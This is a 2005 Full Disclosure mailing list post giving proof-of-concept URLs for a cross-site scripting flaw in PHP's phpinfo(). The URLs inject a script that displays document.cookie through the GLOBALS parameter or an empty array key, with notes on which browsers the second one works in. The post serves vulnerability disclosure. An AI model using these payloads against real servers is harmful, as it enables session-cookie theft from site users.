Full Disclosure mailing list archives
PoC for PHP Cross Site Scripting (XSS)XVulnerability in phpinfo()
From: Moritz Naumann <security () moritz-naumann com>
Date: Fri, 04 Nov 2005 12:23:42 +0100
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 phole () hushmail com schrieb:
PoC: phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script>
...or just use phpinfo.php?[]=<script>alert(document.cookie);</script> Saves some typing. In contrary to the above, this one only works on IE (tested 6 on XP SP2) & Konqueror (tested 3.4.2), though. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.1 (GNU/Linux) iD8DBQFDa0S+n6GkvSd/BgwRAr56AJ0aSs+7n00IdUk6HQRd+Akwe2EJIgCeOIm9 eLVPXP/uSdLOxg5/w1pB2no= =C/qI -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Re: Advisory 18/2005: PHP Cross Site Scripting (XSS)XVulnerability in phpinfo() phole (Nov 03)
- PoC for PHP Cross Site Scripting (XSS)XVulnerability in phpinfo() Moritz Naumann (Nov 04)
- Re: Advisory 18/2005: PHP Cross Site Scripting (XSS)XVulnerability in phpinfo() Robert Waters (Nov 04)